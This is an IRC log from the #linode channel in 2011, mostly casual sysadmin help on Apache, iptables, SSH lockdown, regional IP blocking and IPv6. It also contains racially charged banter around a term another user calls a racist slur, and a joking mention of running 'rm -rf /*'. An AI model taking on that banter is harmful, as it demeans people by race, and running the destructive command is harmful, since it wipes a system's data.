22:57<karanlyons>Lists open files of a given process, where you supply the process id (PID).
22:57<Antwan>that sounds like what I need!
22:57<karanlyons>It's not, you know, the best way to do this. But you don't have any logs, so I'd give it a shot.
22:58<karanlyons>You're a little dependent on whether or not the process has the file it's serving open, though. And I don't remember how Apache serves requests.
22:58<apsqwla>damn i actually rm-rf/* my desktop instead of my l inode
22:58<karanlyons>...
22:58<apsqwla>j/k HAHAH
22:58<karanlyons>...
22:59<squircle>wow..
22:59<apsqwla>pretty funny
22:59<Daevien>not really
22:59<karanlyons>nope.
22:59<squircle>not at all
22:59<tonyyarusso>Are other people laughing?
22:59*karanlyons looks around.
22:59<karanlyons>Gonna say no, chief.
23:00-!-cereal is now known as cereal|Away
23:00<randallman>HAHAHA
23:00<randallman>(oh wait)
23:00<akerl>Antwan: Where does your vhost config say it should be logging?
23:01*Daevien crashes a car into randallman's local office to keep him busy
23:01-!-techhelper1 [~techhelpe@user-118brsl.cable.mindspring.com] has joined #linode
23:01<karanlyons>Antwan: If you just want to dump your configs into p.linode.com, we can take a look at it.
23:02-!-gadams [~IAmMrAwes@static-72-248-178-82.mas.onecommunications.net] has quit [Quit: Leaving]
23:03<apsqwla>randallman, does your home connection do ipv6
23:03<randallman>using a HE tunnel
23:05<apsqwla>what do you do with it
23:05<karanlyons>Use the internet.
23:06<Knight>My name is Maximus Decimus Meridius..
23:06<apsqwla>Knight, i like your monkeyshine
23:06-!-gawry [~gustavoga@187.126.88.190] has quit [Ping timeout: 480 seconds]
23:06<karanlyons>apsqwla: You're aware that's a racist term, right?
23:07<apsqwla>not really
23:07<apsqwla>what does mean
23:07-!-walterheck_ [~walterhec@78.180.80.169] has joined #linode
23:07<karanlyons>apsqwla: http://tinyurl.com/3fgp747
23:07-!-walterheck [~walterhec@78.180.87.129] has quit [Ping timeout: 480 seconds]
23:07<mikegrb_>lulz
23:07<apsqwla>i think its a funny word that i learned today....a proper response to knights intro lol
23:08<Knight>like apeshine would be more.. apropriate?
23:08<Daevien>karanlyons: his brain shut off a while ago. he just spews nonsense
23:08<karanlyons>Daevien: This is becoming rapidly apparent.
23:08<akerl>karanlyons: Did you actually try that?
23:08<karanlyons>Antwan: How's it going?
23:08<apsqwla>hmm urbandictionary says nothing really
23:09<karanlyons>akerl: Yeah, apparently lmgtfy doesn't work anymore.
23:09<karanlyons>Oh well.
23:09-!-gawry [~gustavoga@187.126.67.89] has joined #linode
23:09<akerl>karanlyons: It works fine, except that google doesn't say anything about it being a racist term
23:09<karanlyons>Really?
23:09<karanlyons>Well, it's a term for any sort of activity undertaken by blacks.
23:09<akerl>Since when?
23:09<karanlyons>Basically, another way to call them monkeys.
23:09<akerl>http://www.merriam-webster.com/dictionary/monkeyshine?show=0&t=1313032170
23:09<apsqwla>bah
23:10<karanlyons>akerl: In the context of the guy who originally said it in the channel, who apsqwla is parroting, it is.
23:10<Daevien>^
23:10<Daevien>i think thats an insult to parrots though karanlyons
23:10<karanlyons>I'm aware it has a more innocous connotation today. But apsqwla was parroting what some white supremacist had said earlier, with no actual knowledge of what he was talking about.
23:10<karanlyons>Daevien: Yeah, they're far more intelligent creatures.
23:11*Knight believes in colorless supremacy
23:11-!-pigdude [~tallen@c-69-143-181-131.hsd1.va.comcast.net] has quit [Quit: Lost terminal]
23:11<apsqwla>hmm pigshine doesnt have the same ring
23:11<apsqwla>donkeyshine works
23:13-!-petemall [~petemall@99-99-38-103.lightspeed.sntcca.sbcglobal.net] has quit [Quit: petemall]
23:15<karanlyons>Antwan: Did you figure out what that apache process was doing?
23:16<p3rsist>Quick poll: Nginx or APache?
23:16<karanlyons>Nginx.
23:16<squircle>nginx
23:16<karanlyons>I mean, it *does* depend, but 99% of the time, Nginx.
23:16<@heckman>Your own web server written in Java...
23:17<squircle>i switched from apache and haven't looked back
23:17<Knight>ambition — noun: 1. An eager or inordinate desire for some object that confers distinction, as preferment, honor, superiority, political power, or literary fame; desire to distinguish one's self from other people, 2. A desire, as in (1), for another person to achieve these things
23:17<Knight>one of my virtues :>
23:17<pixl>gopher
23:17<@heckman>I use apache for my Git/ChiliProject(Redmine) Linode.
23:17<karanlyons>heckman: It's far more enterprisey.
23:17<@heckman>The other oen uses Nginx.
23:17<@heckman>s/oen/one/
23:18<p3rsist>http://www.webandblog.com/reviews/apache-vs-nginx-testing-performance-under-heavy-load/
23:18<akerl>Ok, so i've pulled up the info on my dynamic IP with revip.info, now I'm trying to figure out how to use that to limit connections to my ISP's IPs
23:18<p3rsist>Check that out :) Nginx seems more and more interesting.
23:18<karanlyons>heckman: Any reason for Apache with Git/ChiliProject?
23:19-!-gawry [~gustavoga@187.126.67.89] has quit [Ping timeout: 480 seconds]
23:19<SelfishMan>akerl: look at the advertised network line under asn
23:19<akerl>So there's a way to tell iptables "Only allow connections to 22 if the asn owner is "My ISP here"?
23:20<@heckman>karanlyons: slightly easier for the settuping
23:20<Kyhwana_>akerl: find out what IP ranges they own and add all of those
23:20<randallman>akerl, perhaps if you ran a daily job or some such :)
23:20<Kyhwana_>afaik iptables can't filter based on ASN
23:21<akerl>Gotcha
23:21<akerl>Off to fiddle with iptables
23:21<@Praefectus>mmmm iptables on rye with honey mustard
23:21-!-gawry [~gustavoga@187.126.71.137] has joined #linode
23:22<straterra>akerl: do what I do..I block every IP allocated to AFRINIC and APNIC
23:22<Kyhwana_>straterra: hey!
23:22<straterra>I don't have customers in that area..and it stopped like 99.9% of spam/brute force attempts
23:22<apsqwla>i need to convert my setup to nginx/php-fpm
23:22<Solver>straterra: so you block me then? :)
23:22<straterra>Kyhwana_: eh?
23:22<Solver>straterra: give me a url to try
23:22<karanlyons>That's sort of scorched earthy.
23:23<straterra>Solver: If you have an IP allocated to AFRINIC or APNIC...yes
23:23<Solver>what url? I'd like to try it
23:23<straterra>https://www.projectstfu.com/
23:23<straterra>Both ipv4 and ipv6 are blocked
23:23<Solver>the IP I'm using now _is_ APNIC :)
23:23<purrdeta>straterra: hardcore :D
23:24*Solver suggests that blocking large parts of the Earth can have unintended consequences
23:24<rnowak>"Special thanks to Fred for helping me setup git properly "
23:24<purrdeta>like when I went to Japan I wouldn't have been able to use my server in this case >.>
23:24<rnowak>SETUPINGS
23:24<straterra>Like what? Singlin out australians, africans, and asians? Too bad
23:24<straterra>rnowak: HAH
23:24<purrdeta>straterra: :P
23:24<straterra>purrdeta: If I know I'm traveling, I'll take it off.
23:25<straterra>But usually..you know..I know before I travel around the world.
23:25<purrdeta>of course. But I'm an idiot. We all know this! :P
23:25-!-tempesta [~atar@32-113-95-178.pool.ukrtel.net] has quit [Ping timeout: 480 seconds]
23:25<straterra>rnowak: It was a PITA to move the code and get it all configurated
23:25<rnowak>ssh in -> tunnel -> great success
23:25<Solver>straterra: well I guess I'll never know what was on the site :)
23:25<straterra>Solver: That's fine :)
23:25<straterra>Makes my logs happier
23:25*ajmitch goes to block all ARIN & RIPE addresses
23:25<straterra>Go for it
23:26<rnowak>enjoy ;p
23:26<Daevien>Solver: it's the official i <3 keith fan page
23:26<rnowak>inb4 can't access google, and finds out ajmitch is actually sergey
23:26<rnowak>Daevien: haha, harsh
23:26<Solver>Daevien: hahaha. I guess I can survive without it then :)
23:26<straterra>Solver: did you think I was kidding? :P
23:27<Solver>straterra: no I didn't but I wanted to see if you blocked v6 as well :)
23:27<straterra>I do
23:27<Solver>yes I know
23:27<karanlyons>akerl: I never asked, but why block off everything except for your block? Is a passphrase/ssh key not enough?
23:27-!-tempesta [~atar@32-113-95-178.pool.ukrtel.net] has joined #linode
23:27<ajmitch>straterra: I can access www.projectstfu.com sorry
23:27-!-stephenplatz [~steve@71-32-90-206.tukw.qwest.net] has quit [Quit: Leaving]
23:27<straterra>What is your ip?
23:28<ajmitch>straterra: btw, how often do you update your address block allocations?
23:28<straterra>The ipv4 ones don't need updated
23:28<straterra>I don't update the ipv6 ones that often
23:28<rnowak>straterra: your demo doesn't work, it doesn't allow me to setuping an account!!!
23:28<straterra>Once a month-ish?
23:28<akerl>karanlyons: Because it's simple to do, and it greatly increases security.
23:29<rnowak>"security"?
23:29<karanlyons>akerl: I'd just worry about if you need to connect from anywhere else. I'm likely to forget/not anticipate an IP change.
23:29<straterra>sekerrrity
23:29<akerl>rnowak: What would you call it then?
23:29<dwfreed>akerl: just use fail2ban
23:29<akerl>dwfreed: No?
23:29<ajmitch>straterra: whois 120.89.80.0 - it should be in an APNIC block
23:29<karanlyons>Wouldn't something like fail2ban or sshguard cover this security issue well?
23:29<squircle>!ipinfo 120.89.80.0
23:29<ajmitch>not my address, but is the starting address of the ISP's block
23:29<Solver>straterra: if I really wanted to look I could use a vpn or proxy (I have my own in the US & UK already) of course :)
23:30<+linbot>squircle: IP: 120.89.80.0; rDNS: None; ASN adv net: 120.89.80.0/21; ASN: AS38437; ASN owner: WIC NZ Ltd Dunedin-based ISP; Abuse contact(s): stewart@wic.co.nz; City: Dunedin; State: Otago; Country: New Zealand; http://revip.info/ipinfo/120.89.80.0
23:30<akerl>With fail2ban or similar, anyone can see my ssh server, and the are just rate limited. With it locked down to my isp's ip block, only people in my small slice of the world even know I run ssh
23:30<straterra>ajmitch: DROP net:120.0.0.0/8 all
23:31<straterra>That's in my rules
23:31<Solver>fail2ban will fail if threy use an exploit that works on the daemon first go
23:31<ajmitch>straterra: then why can I access the site over https?
23:31<karanlyons>ajmitch: HTTPS is a different port. Maybe he didn't block it?
23:32<ajmitch>karanlyons: I thought he'd said he dropped all traffic, no matter what port
23:32<straterra>Nope..its not allowed
23:32<karanlyons>Oh, weird.
23:32<straterra>I drop all traffic except for DNS
23:32-!-MrPPS [~quassel@canyouget.in] has quit [Ping timeout: 480 seconds]
23:32<karanlyons>(Sorry, I'm managing three different conversations right now, in addition to this firehose)
23:32*Solver cannot access it over 443
23:33<ajmitch>something's broken somewhere
23:33<straterra>ajmitch: You're being proxied
23:33<straterra>Your IP isn't in any of my apache logs
23:33-!-MrPPS [~quassel@canyouget.in] has joined #linode
23:33<ajmitch>straterra: interesting, I'm using the browser on the system which shouldn't be going through any proxy
23:33<straterra>Unless your ISP is doing it without your knowledge :)
23:33<Solver>transparent proxy somewhere?
23:34<ajmitch>visiting a site like ip4.me shows the expected ip address
23:34<ajmitch>fairly sure they don't, it's a small ISP
23:34<akerl>Oops
23:34<Solver>ajmitch: mtr
23:34<straterra>I dunnp..I just know your IP isn't in my apache logs
23:34<akerl>"Write failed: Broken pipe" <-- I'm full of fail
23:34<straterra>dunno ^
23:34-!-dwfreed [~dwfreed@wopr.csl.mtu.edu] has quit [Quit: Need to restart irssi]
23:34<ajmitch>straterra: ah, figured it out :)
23:34<ajmitch>he.net ipv6 tunnel :)
23:34<Solver>ahah
23:34<Solver>:)
23:34<straterra>...
23:34<straterra>SEE?
23:35<straterra>Cheater
23:35<ajmitch>ipv6 just works, I tend to forget it's enabled :)
23:35<ajmitch>though we should probably get a native allocation from our ISP instead
23:35*Solver is on native v6
23:36<ajmitch>Solver: where?
23:36<Solver>APNIC :)
23:36<karanlyons>Bah, I've got a business line here and I still don't have native IPv6.
23:36<karanlyons>Comcast blows.
23:36<Solver>perhaps not surprisingly APNIC has been doing v6 for quite a while now
23:36*ajmitch saw that internode had an announcement that ipv6 is available to all their customers who request it & will be supported
23:36<squircle>i will be on native v6 next week
23:37<squircle>bye bye HE
23:37<ajmitch>still waiting on my home ISP to do an ipv6 trial
23:37<apsqwla>innertrode?
23:38<purrdeta>squircle: luckyyy :P
23:38<squircle>:)
23:38-!-dwfreed [~dwfreed@wopr.csl.mtu.edu] has joined #linode
23:38-!-smed [~smed@ool-4353493d.dyn.optonline.net] has quit [Read error: Connection reset by peer]
23:39<ajmitch>native ipv6 should be something we expect from ISPs rather than a rarity
23:39-!-smed [~smed@ool-4353493d.dyn.optonline.net] has joined #linode
23:39<karanlyons>A long with a whole host of other things.
23:39<karanlyons>Like no caps, fast speeds.
23:40-!-maushu [~maushu@78.130.1.41.rev.optimus.pt] has quit [Ping timeout: 480 seconds]
23:40<JoeK>if we did ipv4 right
23:40<JoeK>we wouldnt need ipv6 for a while yet
23:40<JoeK>:#
23:40<ajmitch>karanlyons: good luck getting either of those in NZ :)
23:40<JoeK>the us department of defense owns 151 million ip addresses, for example
23:40<karanlyons>ajmitch: Oh jeez, you're in NZ? I'm. So. Sorry.
23:40<buddyw>now we just need to figure out how to do ipv6 wrong.
23:40<JoeK>(sorry i cant help myself with this, i got no http, only irc); can anybody recommend a good mexican vps host?
23:40<JoeK>:#
23:40<karanlyons>JoeK: Yeah, but they need those for national security.
23:41<JoeK>.
23:41<squircle>"national security"
23:41<ajmitch>karanlyons: 20GB cap is awesome
23:41<JoeK>and the postal service needs a /8 too i guess
23:41<karanlyons>Huge freaking air quotes.
23:41<squircle>yep
23:41<karanlyons>ajmitch: I pulled down 70GB in a couple days, I have no idea how you can deal with a 20GB cap.
23:42<ajmitch>this is despite having a 20MBps adsl 2+ connection
23:42-!-JSharp [~j@173-228-94-51.dsl.dynamic.sonic.net] has joined #linode
23:42<buddyw>yuck
23:42<Solver>JoeK: even if all the locked up v4 addresses were returned they would likely only last a few months. that;s how fast the Internet continues to grow
23:43<rnowak>TO THE CLOUD
23:44<karanlyons>Yeah, we didn't screw up IPv4, it's moreso that no one anticipated this growth.
23:44-!-petemall [~petemall@99-99-38-103.lightspeed.sntcca.sbcglobal.net] has joined #linode
23:44<Solver>Vint Cery appologised for making the address space 32bits
23:45<Solver>:)
23:45<Solver>Vint Cerf, even
23:45<karanlyons>Poor guy, how could he have known?
23:45<Solver>the thing is had he made it smaller then the run out would have happened when the 'net was much smaller
23:45<Solver>and had it he mad eit bigger the space may have lasted for decades
23:45<Solver>so imho it was just the wrong size :)
23:46<Daevien>nat messed up the timeframe as well
23:46<buddyw>a 24bit ipv4 could have gone out with token ring
23:46<apsqwla>everything was smaller back then
23:46<straterra>I wish it would have
23:47<straterra>so people would stop getting hardons over carrier grade NAT and how ipv6 adoption doesn't need to happen
23:47<squircle>i hate how some people are pushing for v6 NAT
23:47<squircle>it just... angers me
23:47<buddyw>I hate nat
23:47<purrdeta>I actually just hate people
23:48<squircle>me too
23:48<Solver>just wait and the uselessness of many:one nat in v6 will become apparent
23:48<squircle>but not you guys
23:48<squircle>!<3
23:48<+linbot><3
23:48<buddyw>it's always such a pita when dealing shitty (real world) software
23:48<purrdeta>yeah most of you are all very nice :P
23:49<Solver>why thank you purrdeta you're quite a nice fellow yourself :)
23:50<Solver>one:one nat in v6 may be ok. It will allow for easy renumbering.
23:51<straterra>ipv6 renumbering is easy anyway
23:51<straterra>Jsut change the prefix
23:51-!-gawry [~gustavoga@187.126.71.137] has quit [Ping timeout: 480 seconds]
23:51<Solver>there are still issues with applications
23:51<Solver>but it is certainly easier
23:52<@heckman>It'll be interesting in the decades to come to see what they would have changed with IPv6.
23:53<ajmitch>all the little things that they regret?
23:53<Solver>there are quite a few from v4
23:53<Solver>easy in hindsight of course
23:54<ajmitch>things like multihoming still not being great for the routing table
23:54-!-gawry [~gustavoga@187.126.73.142] has joined #linode
23:54<@heckman>ajmitch: Yeah. "Had we known back then..." type things
23:55<rnowak>if only urmom had known...
23:55<squircle>!urmom
23:55<rnowak>*boom*
23:55<+linbot>squircle: Yo mommas so old that when she was in school there was no history class! (789:10/5) [murom]
23:55<Musfuut>I personally think 1 address is enough for everyone, just send everything to everyone, and listen to what everyone says. Like one big data orgy.
23:56<@heckman>I have a feeling v6 will run out sooner than they expect.
23:56<A-KO>I don't think it will
23:56<squircle>heckman: agreed
23:56<@heckman>If they keep handing out blocks like candy it might.
23:56<squircle>heckman: exactly!
23:56<chesty>free candy
23:56<Musfuut>A sizable portion of IPv6 will get sucked up, for the hell of it, because it will never run out
23:57<Daevien>famous last words
23:57<Musfuut>heckman is a bright man
23:57<JoeK>heckman: cant you get thousands of v6 addresses now?
23:57<rnowak>never is a very long time
23:57<JoeK>for one person, no justification needed
23:57<A-KO>uhm
23:57<@heckman>Musfuut: If you divide all v6 address space by the number of people in the world you get 5,859,375 per person.
23:57<A-KO>I just routed myself a /48 and built a VM network off of it
23:57<rnowak>what if every single ant will want a block?
23:57<karanlyons>There are so many addresses, we can all take thousands of them!
23:57<A-KO>so there's definitely justification
23:57<squircle>obligatory: http://xkcd.com/865/
23:57<A-KO>:P
23:57<mikegrb_>mmm cake
23:57<karanlyons>It's like dieting by only eating half a slice of cake.
23:58<Musfuut>heckman: So not nearly enough
23:58<karanlyons>And since it's half a slice, you can eat twice as much!
23:58<@heckman>Musfuut: people are getting /48s. Do you know how many IPs that is?
23:58<Kyhwana_>heckman: but since every person will have at least two cellphones, you'll only get half of that!
23:58<akerl>Anybody wanna do me a favor and tell me what ports they see as open on 69.164.217.166 ?
23:58<A-KO>bajillions
23:59-!-VS_ChanLog [~stats@ns.theshore.net] has left #linode [Rotating Logs]
23:59-!-VS_ChanLog [~stats@ns.theshore.net] has joined #linode
23:59<+linbot>Point (0.65374855, 0.27749686) lies within the unit circle. Hits: 99043 of 125773 (π ≈ 3.149897036724893 - 0.008304383135100). http://π.hoopycat.com/
23:59<Kyhwana_>and then a quarter, since everyone will also have a desktop and a laptop/tablet!
23:59<@heckman>http://p.linode.com/5619
23:59<Kyhwana_>That doesn't leave very many IP's per person!
23:59<A-KO>but an ISP can hand out 262,144 /48's from a single /30. Further, they can get multiple /30's as needed, and if they REALLY wanted they could just hand out /56's.....and even the largest ISPs would have enough /56's to handle pretty much all of their customers....
23:59<A-KO>so I dunno
23:59<A-KO>I don't see the issue
23:59<Musfuut>Some day, every item in your fridge will have its own address from creation to landfill/recycling
23:59<akerl>I'm trying to figure out why 53 shows as closed, when I specifically have it set to ACCEPT on both tcp and udp
---Logclosed Thu Aug 11 00:00:07 2011